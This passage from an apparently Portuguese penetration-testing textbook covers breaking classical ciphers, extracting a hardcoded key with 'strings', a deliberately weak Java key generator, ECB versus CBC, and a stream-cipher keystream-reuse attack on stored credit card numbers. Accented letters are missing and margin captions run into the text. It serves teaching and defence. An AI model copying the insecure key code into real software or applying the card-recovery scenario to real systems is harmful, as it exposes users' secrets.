esto se mudando para a capital, em busca de novos desafios de trabalho. Por meio de uma e em um trecho de
rpida comparao dos histogramas da Figura 9.18, percebe-se que, alm das distribuies artigo.
semelhantes, as trs letras mais frequentes da lngua portuguesa ocupam os mesmos

postos no exemplo fornecido.
Futurismo a palavra da moda em guas Claras. Todo mundo usa, mas isso no quer dizer
que seu significado seja claro. Um dia depois da minha chegada, um corretor de imveis vem
conversar: O senhor precisa conhecer o nosso projeto. o que h de mais atual em termos
de futurismo, diz (mesmo sem entender nada, aceito um carto para visitar o estande de
vendas do edifcio). Mais do que antever o amanh, ou o dia incerto no qual a cidade que
emerge com velocidade estonteante estar definitivamente construda no Distrito Federal,
o futurismo um modo de explicar uma arquitetura que, acreditam os moradores, servir
para diferenciar seu novo hbitat. Ou seja, um estilo. Ou uma maneira curiosa de tentar Figura 9.18
buscar identidade esttica em uma cidade de feies nicas no Brasil absolutamente Comparao das
frequncias das
vertical, na qual centenas de espiges residenciais, finalizados ou em obras, se projetam letras em portugus
rumo aos cus do Planalto Central, anunciando um novo tempo nas adjacncias da capital e em um trecho de
da Repblica (Ribeiro, 2011). artigo.
430
O mtodo conhecido por anlise de frequncias, introduzido no sculo IX pelo polmata q
rabe Ab Ysf Yaqb ibn Is-hq ibn as-Sabbh ibn omrn ibn Ismal al-Kind, emprega
os conceitos recm apresentados, para quebrar cifras de substituio simples. O pri-
meiro passo consiste em descobrir o idioma da mensagem original, o que fundamental
para saber quais so as frequncias esperadas de cada letra do alfabeto. Em seguida,
deve-se realizar a contagem de cada smbolo presente no texto cifrado sendo analisado.
Como cifras monoalfabticas apenas alteram a face de cada smbolo, mantendo a
distribuio geral de frequncias, razovel assumir que cada elemento do texto cifrado
corresponde a uma letra similarmente frequente do alfabeto original.
Por exemplo, em um texto em ingls, se Z a letra cifrada com maior nmero de ocorrn-
cias, h uma grande probabilidade de que seja o mapeamento da letra e.
Para facilitar a compreenso da tcnica de al-Kind, o texto cifrado apresentado na Figura 9.19
ser minuciosamente criptoanalisado. Considere-se que a mensagem original foi redigida
na lngua inglesa e que uma cifra de substituio simples foi empregada para proteg-la. Um
forte indicativo de que a ltima premissa est correta o ndice de coincidncia igual a 0,0723,
que revela uma alta redundncia no texto cifrado. Por outro lado, se ele fosse a nica ferra-
menta utilizada para identificar a lngua original, a principal candidata teria sido o espanhol,
em vez do ingls. Isso ocorre porque o IC um indicador estatstico, com valores muito pr-
ximos para os diversos idiomas, o que faz com que no seja uma tcnica precisa para alcanar
esse propsito.
DSFY CQLGRBGJOFUT XJTG SJY IQBG YQXSFYDFCJDGL GAGIGUDY JD DSG RQDDQI

QP DSG XJTG PQB GZJIXAG MQW CJU JAYQ GZJIFUG DSG PBGHWGUCM QP XJFBGL
Figura 9.19 AGDDGBY JUL CQIXJBG DSGI DQ DSG PBGHWGUCM QP XJFBGL AGDDGBY FU
Texto cifrado com ci- GUTAFYS QB MQW CJU AQQO JD BGXGJDGL AGDDGBY QB DSG EQVGA DBQVGA
fra monoalfabtica.
A primeira tarefa que deve ser realizada calcular as frequncias individuais de cada
smbolo no texto cifrado e compar-las com a estrutura da lngua inglesa. O resultado,
apresentado na Figura 9.20, mostra que as trs letras mais comuns no texto so G, D e
Figura 9.20 Q, em ordem decrescente de percentual de ocorrncias. Estatisticamente, a partir da
Frequncias indi- ltima linha do grfico, conclui-se que elas so os mapeamentos de e, t e a, respectiva-
viduais das letras
do texto cifrado mente. Desse modo, deve-se proceder substituio de G por e, D por t e Q por a,
comparadas com as conforme ilustrado na Figura 9.21, a qual est dividida em tabela de mapeamento de
da lngua inglesa. deciframento, texto em claro parcial e texto cifrado.
431
Figura 9.21
Anlise de frequn-
cias (1/11) - substi-
tuio de G, D e
Q por e, t e a,
respectivamente.
Observem-se as partes marcadas em vermelho na figura acima. Tudo indica que t*e
corresponde palavra the e, portanto, todas as ocorrncias de S, no texto cifrado, devem
ser substitudas pela letra h (vide Figura 9.22). Um problema destacado por esta ilustrao
a palavra ta, circundada no quadro, a qual no usual na lngua inglesa. Como a letra t
parece ter sido corretamente mapeada, uma vez que ela faz parte do texto legvel recupe-
rado, a troca de Q por a foi aparentemente equivocada. Assim, essa substituio deve ser
cancelada, obtendo-se o exposto na Figura 9.23.
Figura 9.22
Anlise de frequn-
cias (2/11); substitui-
o de S por h.
Figura 9.23
Anlise de fre-
quncias (3/11);
cancelamento da
substituio de
Q por a.
432
Considerando-se que o mapeamento de Q por a no foi acertado, deve-se escolher outra
letra candidata. A partir de t*, fcil inferir que o melhor substituto para Q a letra o.
Uma evidncia adicional para confirmar esta hiptese que a letra com frequncia mais
prxima de Q, que no o a, justamente a letra o (vide Figura 9.20). Efetuando-se esta
troca, alcana-se a situao exibida na Figura 9.24.
Dando continuidade atividade, a sequncia o*, marcada em vermelho na figura nos d

as opes of, on e or como possveis textos originais. Para decidir qual a melhor delas,
deve-se comparar a frequncia de P, no texto cifrado, com as de f, n e r, no padro da
lngua inglesa, e determinar qual a mais prxima. No presente exemplo, feita esta anlise,
conclui-se que f a contraparte legvel de P. Considerando-se que esta hiptese esteja
correta, a sequncia PQB vira fo*, a qual, facilmente, pode ser traduzida para for. Esta
nova relao reforada pela presena de QB no texto cifrado, cujo deciframento resulta na
palavra vlida or. A Figura 9.25 reflete as alteraes decorrentes dessas ltimas substituies.
Figura 9.24
Anlise de frequn-
tuio de Q por o.
Figura 9.25
Anlise de frequn-
tuio de P por f
e de B por r.
Vamos agora focar a ateno na sequncia *t, que pode ser substituda por it e at. Para
definir a palavra mais provvel, repetimos o procedimento de anlise das frequncias e
encontramos que J, com 8%, est mais prximo de a, com 8,2%, do que de i, com 7,0%.
Aps a troca dos Js por as, atinge-se a situao ilustrada na Figura 9.26, na qual esto
ressaltadas as palavras parciais a** e *a*, que correspondem, respectivamente, a JUL e
CJU. Para a primeira, possvel pensar em and e are, mas esta descartada porque r e
e so letras do alfabeto original j mapeadas. Supondo que as trocas de U por n e de L
por d estejam corretas, CJU torna-se *an, que pode ser man ou can. Novamente, pela
tabela de ocorrncias, opta-se pelo mapeamento de C para c.
433
Figura 9.26
Anlise de frequn-
tuio de J por a.
Figura 9.27
Anlise de frequn-
tuio de C, L e
U por c, d e n,
respectivamente.
Na Figura 9.27, possvel realizar as substituies X g p, Y g s e I g m, resultando

nas palavras repeated, has, more, compare e them. Em seguida (Figura 9.28), as
palavras this, page, sophisticated, elements, also, paired, in, letters e english
podem ser identificadas, como consequncia dos mapeamentos F g i, T g g e A g l.

Note-se que neste estgio (Figura 9.29) o texto em claro quase que completamente inteli-
gvel, e palavras adicionais podem ser enumeradas, como bottom, example, you,
examine e frequency. Para isso, as substituies R g b, Z g x, H g q, W g u e
M g y devem ser efetuadas. Finalmente, a partir da Figura 9.30, basta trocar O por k,
E por v e V por W, para completarmos o texto legvel, representado integralmente na
Figura 9.31.
Figura 9.28
Anlise de frequn-
tuio de X, Y e
I por p, s, e m,
respectivamente.
434
Figura 9.29
Anlise de frequn-
tuio de F, T e
A por i, g e l,
respectivamente.
Figura 9.30
Anlise de frequn-
cias (10/11) - subs-
tituio de R, Z,
H, W e M por
b, x, q, u e y,
respectivamente.
Figura 9.31
Anlise de frequn-
cias (11/11) - texto
original recuperado
(Simon Singh).
Cifra de Vigenre
A cifra de Vigenre um algoritmo de substituio polialfabtico que utiliza, ciclica- q
mente, t mapeamentos da cifra de deslocamento, especificados por uma chave K = k1k2 ...
k t. Pode-se imaginar que o ciframento opera sobre grupos de t letras, de modo que cada
posio da chave descreve a transformao que deve ocorrer na posio correspon-
dente de cada grupo.
Em outras palavras, k1 afeta o primeiro elemento de todos os grupos, k2, o segundo, e assim
por diante. Graas a isso, um smbolo que se repete no texto em claro pode ser mapeado
para smbolos diferentes no texto cifrado, se cada instncia for protegida por um ki distinto.
Como na poca em que era utilizado, o algoritmo era executado manualmente, as pessoas
se apoiavam na Tabela de Vigenre, representada na Figura 9.32, para auxiliar nos processos
435
de ciframento e de deciframento. Por exemplo, para cifrar a letra g com a subchave U,
basta selecionar o caractere presente na interseco da linha iniciada com U com a coluna
g, ou seja, a letra A. Analogamente, para decifrar V com a subchave H, deve-se per-
correr a linha H at encontrar a letra V e selecionar o smbolo que est na primeira linha
da mesma coluna, isto , o caractere o.
Para um exemplo completo, considere-se o ciframento do texto outro porto longe daqui Figura 9.32
com a chave PENTEST, de sete caracteres de comprimento. A primeira letra da mensagem Tabela de Vigenre.
mapeada de acordo com a linha da tabela de Vigenre que inicia com a letra P. Esta
mesma transformao aplicada a todo caractere que esteja a uma distncia mltipla do
tamanho da chave (no caso, sete) do primeiro elemento. Isto equivalente a dividir o texto
legvel em blocos de tamanho sete e aplicar o mapeamento descrito pela primeira letra da
chave primeira posio de cada bloco. O processo de ciframento com as demais letras da
chave realizado de maneira similar, resultando no texto cifrado exibido na Figura 9.33.
H dois aspectos muito importantes que devem ser observados nesse exemplo, que auxi-
liaro na criptoanlise de mensagens protegidas com o algoritmo.
O primeiro deles que os smbolos do texto cifrado, que ocupam a mesma posio nos q
diversos blocos, constituem a sada de uma cifra monoalfabtica, uma vez que foram
todos cifrados com chave idntica.
Consequentemente, esto sujeitos criptoanlise por meio de anlise de frequn-

cias, ou por busca exaustiva de chaves, por se tratar de uma cifra de deslocamento. O
segundo ponto relevante que a frequncia das letras no texto em claro diluda no
texto cifrado e, por isso, o ndice de coincidncia tende a se aproximar de IC A .
436
Note-se, por exemplo, que na Figura 9.33, a letra o mapeada para D, S, H e B. q
Como a chave escolhida utiliza cinco letras distintas, qualquer letra do texto em claro
pode ser cifrada, no mximo, de cinco maneiras diferentes.
Chave P E N T E S T P E N T E S T P E N T E S
Texto em claro o u t r o p o r t o l o n g e d a q u i
Texto cifrado D Y G K S H H G X B E S F Z T H N J Y A
Figura 9.33 O mtodo utilizado para quebrar a cifra de Vigenre, que ser descrito a seguir, foi q
Exemplo de uso da introduzido por Charles Babbage, gnio ingls que nasceu no final do sculo XVIII e
cifra de Vigenre.
considerado o pai do primeiro computador da histria (Singh, 1999). Parte da tcnica,
tambm atribuda a Kasiski, est contida na explicao do pargrafo anterior e consiste
em se analisar separadamente cada uma das cifras de deslocamento utilizadas, com um
dos mtodos j conhecidos.
Para que isso possa ser realizado, porm, falta saber o tamanho da chave empregada, sem o
qual, no possvel delimitar os grupos de letras que foram cifrados com a mesma subchave.
Imagine-se que um texto de tamanho razovel, contendo vrias ocorrncias da palavra q

ano, seja cifrado com a chave CASA. Caso instncias diferentes de ano sejam
cifradas com a mesma parte da chave, os resultados sero idnticos.
Note-se que o nmero de maneiras diferentes pelo qual uma palavra pode ser cifrada por
Vigenre exatamente o tamanho da chave, que neste caso quatro. Por consequncia, se
houver mais de cinco ocorrncias de ano, certamente, haver repetio de um dos poss-
veis textos cifrados para essa palavra (CNG, AFO, SNQ e APO).
Desconsiderando o fator coincidncia, a distncia entre sequncias idnticas de sm- q

bolos cifrados , necessariamente, mltipla do tamanho da chave, conforme ilustrado na
Figura 9.34. Para calcular os comprimentos candidatos, a partir da distncia, preciso
fatorar o valor em nmeros primos e combin-los de todos os jeitos possveis.
No exemplo abaixo, o nmero de posies entre as repeties 24, que igual a 2 3 x 3,

na forma fatorada. Agrupando os primos encontrados, obtm-se os valores: 2, 3, 2 2 = 4,
2 x 3 = 6, 2 3 = 8, 22 x 3 = 12 e 2 3 x 3 = 24.
Figura 9.34 A estratgia, ento, seguir esse mesmo processo, para todas as repeties encon-
Tamanhos de chave
tradas no texto cifrado, e verificar o tamanho mais comum.
possveis calculados
pela distncia
Conseguida essa informao, basta executar a anlise de frequncias sobre a sequncia de
entre as ocorrncias
de APO. caracteres gerada para cada posio da chave, e finalizar a criptoanlise.
A melhor maneira de compreender a tcnica de Babbage realizar um exerccio de quebra

de um texto protegido pelo algoritmo de Vigenre. A partir do texto cifrado exibido na
437
Figura 9.35, cujo original est em ingls, o primeiro passo determinar o tipo de cifra que foi
utilizada na proteo da mensagem. Calculando-se o ndice de coincidncia, obtm-se o
valor 0,0397, o qual, por ser muito prximo de IC A (conforme esperado), indica que uma cifra
polialfabtica foi empregada. Supondo que esta seja a cifra de Vigenre, o prximo passo
determinar o tamanho da chave escolhida. Para isso, precisamos encontrar todas as
repeties de sequncias de letras, calcular a distncia entre as ocorrncias, e determinar os
comprimentos de chave possveis, a partir da fatorao do valor encontrado. O resultado
desta etapa est ilustrado na Figura 206.
Figura 9.35
BHGVSZGJQPHAOMTSHGNZZNFBCJVQZAZTVQYLTJMQNNKASNNIBZZCJMDYOCE- Texto cifrado
ZSDGZQZLNQQJSKHPUIEBFWEQNLGEIOLWMCVEMEDMRLATPTRSGTQBAUAEFN- com o algoritmo
FQYLOPICFIUMOULCBQTROQYFCQZYJRQNEMEUBFIIQPPBAUIHNZGVPIONLXFNYQE- de Vigenre.
MAHINJLKSPBRKVVQEFXLWCJUPSTCVOFMQAEUIVMZZSGFAWEUATTNQDPWHKAD-
MOWTOJRUELXFNCYLAEWLWSGJCTWPKWTAMIWQTGICXAPLEFTVMCXHKAEMIESM-
TOVAHJRGXLYCJMOFNFKZGBNMOFNFETYHQVPMAPLSJLGIYYOPICTUIPDYIESH- Figura 9.36
MINMHNTJBSJOVPPWHGPPQDQCEMIUJLYTGZPIHCBQTRCTXX Sequncias de
caracteres repeti-
das encontradas
no texto cifrado e
possveis tamanhos
de chave.
438
fcil observar, na tabela de repeties, que o tamanho mais provvel de chave cinco, pois
a coluna que possui quase todas as linhas marcadas. Somente as ocorrncias de LXF,
XFN e LXFN, pertencentes mesma sequncia, no esto separadas por uma distncia
mltipla de cinco, indicando uma provvel coincidncia, que no invalida a hiptese original.
A partir do tamanho encontrado, necessrio trabalhar sobre cinco cifras de deslocamento
distintas, cujos agrupamentos de letras so definidos pelas posies em cada bloco de cinco
elementos. Desse modo, todos os smbolos que ocupam a primeira posio formam um
grupo; todos na segunda, outro, e assim por diante, at os elementos da quinta posio.
A Figura 9.37 mostra o grupo formado pelos elementos que esto na primeira posio de cada
bloco. Ao realizar a anlise de frequncias sobre essas letras e compar-las com a frequncia
da lngua inglesa, obtm-se os histogramas apresentados na Figura 9.38(a). Lembre-se de que
a cifra de deslocamento, simplesmente, rotaciona o alfabeto em k posies. Com isso, a trans-
formao que causa no texto faz com que as frequncias individuais das letras sejam transfe-
ridas para outras, como esperado, mas respeitando-se a ordem que ocupam no alfabeto.
Graficamente, isto implica que o histograma do texto em claro rotacionado o mesmo nmero
de posies que o alfabeto. Considerando que, estatisticamente, a distribuio das letras origi-
nais deve ser semelhante do idioma, basta alinhar os histogramas para revelar o mapeamento
utilizado. Uma dica para a lngua inglesa basear a tarefa nos picos das letras A e E, que cos-
tumam se destacar das demais. A Figura 9.38(b) ilustra o alinhamento realizado para o exemplo
em estudo, o qual, aplicado Figura 9.37, resulta no texto decifrado da Figura 9.39.
A aplicao desses passos para a segunda posio apresentada na Figura 9.40 at a

Figura 9.42. Note-se que os histogramas j esto alinhados e, portanto, nada precisa ser
feito. Para a terceira posio, analisada na Figura 9.43 at a Figura 9.45, a letra de maior fre-
quncia no texto cifrado a G, o que a faz a principal candidata para a letra e. Ocupando
este mesmo papel, no grupo de smbolos da quarta posio, est a letra M, conforme
ilustrado na Figura 9.47(a). Ajustando os histogramas e realizando as devidas substituies,
obtm-se o texto da Figura 9.48, no qual j possvel identificar algumas palavras, como
when e came. A etapa final, referente ao ltimo mapeamento, baseia-se nos picos das
letras L e P e exibida na Figura 9.49 Figura 9.51. Do processo inteiro, conclui-se que a
chave empregada para a proteo do texto FACIL.
Figura 9.37
Grupo formado
pelos caracteres
que ocupam a
primeira posio
de cada bloco.
439
Figura 9.38
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
primeira posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
primeira posio
alinhado ao do
idioma.
(a) (b)
Figura 9.39
Substituio
dos smbolos
da primeira
posio, segundo
mapeamento
ilustrado na
Figura 9.38(b).
Figura 9.40
Grupo formado
pelos caracteres
que ocupam a
segunda posio de
cada bloco.
Figura 9.41
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
segunda posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
segunda posio
alinhado ao
do idioma.
(a) (b)
Figura 9.42
Substituio
dos smbolos da
segunda posio,
segundo mapea-
mento ilustrado na
Figura 9.41(b).
440
Figura 9.43
Grupo formado pe-
los caracteres que
ocupam a terceira
posio de
cada bloco.
Figura 9.44
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
terceira posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
terceira posio
alinhado ao do
idioma.
(a) (b)
Figura 9.45
Substituio dos
smbolos da terceira
posio, segundo
mapeamento ilus-
trado na
Figura 9.44(b).
Figura 9.46
Grupo formado
pelos caracteres
que ocupam a
quarta posio de
cada bloco.
Figura 9.47
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
quarta posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
quarta posio
alinhado ao
do idioma.
(a) (b)
441
Figura 9.48
Substituio dos
smbolos da quarta
posio, segundo
mapeamento ilus-
trado na
Figura 9.47(b).
Figura 9.49
Grupo formado
pelos caracteres
que ocupam a
quinta posio de
cada bloco.
Figura 9.50
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
quinta posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
quinta posio
alinhado ao
do idioma.
(a) (b)
Figura 9.51
Substituio dos
smbolos da quinta
posio, segundo
mapeamento
ilustrado na Figura
9.50(b), e incluso
de espaos para
separao de
palavras. O texto
recuperado
um trecho da
Roteiro geral de teste estria The Model
q
Millionaire de
Quando no processo de teste de invaso for encontrada informao inelegvel, porm Oscar Wilde.
textual, deve-se tentar criptoanalis-la, sob a premissa de ter sido protegida por uma
cifra clssica. O seguinte roteiro pode servir de base para a tarefa:
1. Calcule o ndice de coincidncia do texto cifrado.
2. Se o ndice for prximo aos de um idioma, h muita redundncia no texto, o que um

indicativo de que uma cifra de substituio simples foi empregada:
2.1.Realize busca exaustiva de chaves contra a cifra de deslocamento.
2.2.Se no for bem-sucedido no passo anterior, aplique a tcnica de anlise de frequncias.
3. Seno, se o ndice de coincidncia for prximo a IC A , uma cifra polialfabtica foi utilizada:
3.1.Aplique o mtodo de Babbage para quebra da cifra de Vigenre.
442
Chave criptogrfica
Voc j embutiu uma chave criptogrfica em algum programa ou script que tenha desenvolvido?
Recuperao de chaves embutidas em cdigo

Imagine-se uma chave criptogrfica embutida diretamente no cdigo, conforme ilustrado q
a seguir:
#include <stdio.h>
int main() {
char key[] = 0a3bc178940fd43047027cda807409af;
...
printf(Cifrando dados. Aguarde...\n);
...
Considere-se que o programa compilado, gerando o binrio cifra, e, por esta razo, o q
desenvolvedor, inocentemente, julga que a chave est protegida de acessos ilegtimos.
O usurio mal intencionado, ao obter o programa, executa imediatamente o comando
strings do Linux sobre o binrio, gerando a sada:
/lib/ld-linux.so.2
#IB
_ _gmon_start_ _
libc.so.6
_IO_stdin_used
puts
_ _libc_start_main
GLIBC_2.0
PTRh
0a3b
c178
940f
d430
4702
443
7cda
8074
09af
[^_]
Cifrando dados. Aguarde...
Pronto! A chave aparece na lista de cadeia de caracteres do programa, agrupada de q

quatro em quatro dgitos hexadecimais.
Este exemplo ilustra um caso simples de extrao de chaves, no qual nenhum mecanismo
sequer foi utilizado para proteg-la. Mesmo que isto ocorresse, a prtica de embutir
segredos no cdigo no recomendvel, pois, cedo ou tarde, uma pessoa habilidosa con-
segue realizar a engenharia reversa e obter a informao desejada.
Gerao de chaves com baixa entropia

Boas chaves criptogrficas devem ser geradas por processos que forneam o mximo de q
aleatoriedade possvel, impedindo, assim, que um adversrio seja capaz de descobri-las
por mtodos determinsticos.
Em outras palavras, a utilizao de uma chave de n bits, criada dessa maneira, implica que,
por adivinhao, a chance de um palpite qualquer ser correto de 1/2n. Considerando
chaves de 128 bits, tamanho comum utilizado atualmente, mais fcil uma pessoa acertar
diversas vezes na loteria do que recuperar a chave certa por meio de escolhas aleatrias.
Na prtica, porm, nem sempre mtodos eficazes so utilizados na gerao de chaves, q

o que resulta em valores com baixa entropia. Exemplos de problemas encontrados com
frequncia neste contexto esto enumerados a seguir:
1 Chaves fixas e com valores previsveis, como 0x00000000..., 0x11111111...,

0x0123456789... etc.
1 Utilizao de geradores de nmeros pseudo-aleatrios fracos, como os implemen-

tados pela classe Random, em Java, e pela funo rand(), em C.
1 Escolha de valores a partir de um pequeno subconjunto do domnio de chaves.

1 Uso de sementes previsveis em geradores de nmeros pseudo-aleatrios.
1 Inicializao de geradores de nmeros pseudo-aleatrios com sementes de poucos
bits, o que permite um ataque de busca exaustiva para descoberta do valor correto.
1 Reutilizao integral ou parcial de chaves criptogrficas.

Considere-se que em um teste de invaso, o seguinte cdigo Java tenha sido obtido, em um
dos diretrios do servidor. Ao que tudo indica, ele utilizado na gerao de chaves cripto-
grficas de comprimento arbitrrio. Com base no exposto, que problemas ele possui?
01 import java.util.Random;
02
03 public class GeraChave {
04 private static Random random = new Random();
444
05
06 public static byte[] geraChave(int numBits) {
07 int numBytes = numBits / 8;
08 byte chave[] = new byte[numBytes];
09
10 // Atribui a cada byte da chave um valor
11 // inteiro j, tal que 0 <= j <= 9
12 for (int i = 0; i < numBytes; i++) {
13 chave[i] = (byte)random.nextInt(10);
14 }
15 return chave;
16 }
17 }
Logo na primeira linha, percebe-se que o programa utiliza a classe Random, a qual,
se sabe, no implementa um gerador criptogrfico de nmeros pseudo-aleatrios. O
uso dela pode ser observado nas linhas 04 e 13, responsveis, respectivamente, pela
criao de um objeto Random e pela atribuio de um valor inteiro entre 0 e 9 i-sima
posio do vetor chave. Este passo apresenta um problema adicional, relacionado
cardinalidade do conjunto a partir do qual a chave selecionada. Uma chave de 128 bits,
por exemplo, corresponde a 16 bytes e, pelo programa, cada posio recebe um valor
dentre 10 possveis. Desse modo, o total de chaves diferentes que podem ser geradas
NIST
de 1016 = 10.000.000.000.000.000. Este nmero apenas uma nfima parcela do espao
National Institute fornecido por 128 bits, cujo total de elementos 2128 = 340.282.366.920.938.463.463.374.
of Standards and 607.431.768.211.456. Consequentemente, um ataque de busca exaustiva de chaves neste
Technology cenrio possui um custo muito menor que o terico.
uma agncia do
Departamento de
Comrcio dos Estados Emprego de modo de operao inadequado
q
Unidos, fundada em
1901, com o objetivo de Como vimos, cifras de bloco dividem o texto em claro em blocos de tamanho fixo e
promover a inovao aplicam a mesma transformao, parametrizada pela chave, a cada um deles. Modos de
e competitividade
industrial, por meio da operao definem a maneira como esses blocos so encadeados no processo de cifra-
definio de padres mento da mensagem inteira.
tecnolgicos para as
mais diversas reas. Existem diversos modos, como os especificados no documento NIST SP800-38A (Dworking,
2001), e todos eles apresentam especificidades, que devem ser consideradas em uma
soluo para evitar a introduo de vulnerabilidades no sistema. Neste texto, focaremos
apenas os modos ECB e CBC, comparando as respectivas propriedades e como devem ser
adequadamente utilizados.
O modo Electronic Code Book (ECB) o mais simples existente e consiste em cifrar cada q
bloco de texto em claro individualmente com a mesma chave.
445
A Figura 9.52 ilustra o processo de ciframento, em modo ECB, de uma mensagem m con-
tendo t blocos de n bits. O processo de deciframento, que similar, est representado na
Figura 9.53. Nas ilustraes, E, E -1, K e c denotam, respectivamente, a funo de ciframento, a
funo de deciframento, a chave empregada e a mensagem cifrada.
Este modo possui as seguintes propriedades (Menezes et al., 2001): q

1 Blocos em claro idnticos geram o mesmo bloco cifrado, quando a mesma chave
utilizada.
1 No h encadeamento entre os blocos, que so cifrados individualmente.

1 O erro em um bloco no afeta o deciframento dos demais.
Figura 9.52
Modo de operao
ECB - Ciframento.
Figura 9.53
Modo de operao
ECB - Deciframento.
A primeira propriedade implica que o modo ECB no deve ser utilizado quando a men- q
sagem a ser protegida maior que o tamanho do bloco da cifra empregada. Quando isto
violado, o texto cifrado revela informaes sobre a mensagem original, as quais podem
ser suficientes para o objetivo do atacante ou auxiliar no processo de criptoanlise.
Por exemplo, considere-se a Figura 9.54 a imagem esquerda o contedo de um arquivo

em formato BMP, cujo ciframento, em modo ECB, resulta na figura da direita. Note-se que,
embora as cores no sejam nada parecidas, a informao carregada pela imagem original
est presente na segunda. Se esta fosse uma foto pornogrfica apreendida em um compu-
tador corporativo, saber o real contedo dela, mesmo com cores distorcidas, seria suficiente
para aplicar uma punio ao colaborador.
446
Figura 9.54
A imagem direita
o resultado do
ciframento, em
modo ECB,
da outra.
Pode-se dizer que uma cifra operando em modo ECB uma cifra de substituio simples, mas
baseada em um alfabeto muito maior que o romano. Dessa maneira, o texto cifrado mantm
a redundncia da mensagem original, o que pode ser facilmente verificado por um teste
que verifica o quanto a informao pode ser compactada. Nveis de compactao maiores
implicam que h muita repetio de valores na mensagem de entrada, o que um bom indica-
tivo de que um modo de operao inadequado foi utilizado. A razo para isso que um texto
cifrado devidamente gerado deve ser indistinguvel de uma sequncia aleatria de valores.
No exemplo acima, foi possvel compactar a figura cifrada a 3,7% do tamanho original.
O modo Cipher Block Chaining (CBC) pode ser empregado para suprir a deficincia do q
modo ECB na proteo de mensagens longas.
A ideia desse modo combinar, por meio do operador XOR, o ltimo bloco cifrado com o
bloco de texto em claro atual, antes de aplicar a funo de ciframento. Isto tem por obje-
tivo alterar blocos em claro idnticos, de modo que entradas diferentes sejam fornecidas
para a cifra utilizada.
O funcionamento do CBC est ilustrado na Figura 9.55 e Figura 9.56. Perceba-se que, para
cifrar m1, no h um bloco cifrado anterior e, assim, um valor inicial, chamado de IV, deve ser
fornecido. Embora no seja necessrio manter o sigilo do IV, a integridade dele funda-
mental para decifrar corretamente o primeiro bloco.
Segundo Menezes et al. (2001), o modo CBC apresenta as seguintes propriedades: q

1 Textos em claro idnticos resultam em textos cifrados iguais, quando mesmos IV
e chave so utilizados no ciframento. Considerando-se apenas blocos idnticos,
necessrio que os respectivos blocos cifrados anteriores sejam iguais, para que os
resultados tambm coincidam.
1 Cada bloco cifrado cj depende de mj e de todos os blocos anteriores (m1 a mj-1), que so
consolidados em cj-1. Por este motivo, uma alterao na ordem dos blocos cifrados
afeta o processo de deciframento.
1 Um erro em um bloco cj afeta apenas o deciframento dele mesmo e do bloco seguinte.

1 O modo CBC se recupera automaticamente de erros em um bloco cifrado cj , a partir
do bloco cj+2.
447
Figura 9.55
Modo de operao
CBC - Ciframento.
Figura 9.56Figura
9.56 Modo de
operao CBC -
Deciframento.
Figura 9.57
Ciframento em
modo CBC da
imagem ilustrada na
Figura 224.
A Figura 9.57 apresenta o resultado do ciframento da Figura 224, em modo de operao

CBC, para ilustrar como ele dilui eventuais padres encontrados no texto em claro. Note-se
que no h nenhuma relao visvel entre a imagem original e a cifrada, que mais parece um
canal de TV no sintonizado. Por meio desse exemplo, fica claro que mensagens maiores
que o tamanho do bloco utilizado pelo criptossistema devem ser cifradas com o modo CBC,
em vez do ECB.
448
ECB
Por que o modo de operao ECB no adequado para mensagens com tamanho maior que
o tamanho do bloco da cifra utilizada?
Uso incorreto de algoritmos criptogrficos

Infelizmente comum encontrar solues que empregam algoritmos criptogrficos fortes, q
mas da maneira incorreta, conduzindo a vulnerabilidades simples de serem exploradas.
Nesta seo, sero examinados os casos de repetio de chaves em cifras de fluxo e uso de
primitiva criptogrfica incorreta para satisfazer a um requisito de segurana da informao.
Cifras de fluxo
Cifras de fluxo aditivas e binrias so cifras sncronas, isto , geram o fluxo de chaves q
independentemente dos textos em claro e cifrado. Alm disso, conforme ilustrado na
Figura 9.58, elas operam diretamente com bits e utilizam o operador XOR, para combinar
a entrada com o fluxo de chaves. Como ele gerado em funo apenas da chave inicial,
quando esta repetida, o mesmo fluxo obtido.
Isto necessrio para o processo de deciframento, mas conduz a uma vulnerabilidade

quando textos diferentes so cifrados com a mesma chave.
(a) Ciframento (b) Deciframento
K K
Gerador de uxo Gerador de uxo

de chaves de chaves
Figura 9.58 zi zi
Modelo geral de
cifras de fluxo aditi- m ci c mi
i i
vas e binrias.
Antes de explicar o problema, necessrio relembrar algumas propriedades do operador XOR:
1 Comutatividade: a b = b a.
1 Associatividade: (a b) c = a (b c).
1 Elemento neutro: a 0 = a.
1 Elemento inverso: a a = 0.
Com esses conceitos em mente, observe-se, agora, como o uso de uma mesma chave, q
em cifras de fluxo aditivas e binrias, pode comprometer a segurana das informaes:
1 Diversas mensagens m1 , m2 , ..., mn , de mesmo tamanho, so cifradas, individualmente, com

uma mesma chave K, o que implica que o fluxo de chaves z o mesmo para todas elas.
1 Do ciframento da mensagem mi, resulta ci = mi z.

1 Calculando o XOR de duas mensagens cifradas, possvel cancelar a ao do fluxo de
chaves e obter o XOR dos textos em claro correspondentes:
449
1 c1 c2 = (m1 z) (m2 z) = m1 m2 z z = m1 m2 0 = m1 m2
A partir disso, possvel realizar uma anlise estatstica, com base na redundncia do q
idioma, para recuperar as mensagens originais.
1 Um ataque mais poderoso possvel quando se conhece o texto em claro mi corres-

pondente a um texto cifrado ci , pois isto permite a recuperao do fluxo de chaves z,
o qual basta para decifrar todas as mensagens protegidas com a mesma chave K:
1 ci mi = (mi z) mi = mi mi z = 0 z = z
Um cenrio de ataque possvel, explorando este problema, descrito a seguir, no escopo de

uma aplicao de comrcio eletrnico:
1. Um usurio malicioso descobre que possvel realizar a cpia integral da base de dados
do sistema, por meio de uma vulnerabilidade em um dos campos da interface.
2. Em uma das tabelas, ele identifica nmeros de carto de crdito protegidos por uma cifra
de fluxo aditiva e binria.
3. O atacante realiza uma compra na loja virtual, com carto prprio, para conseguir o texto
em claro de um valor cifrado.
4. O novo registro recuperado da base de dados, explorando a mesma vulnerabilidade.
5. Para recuperar o fluxo de chaves, calculado o XOR do nmero de carto conhecido e o

texto cifrado correspondente.
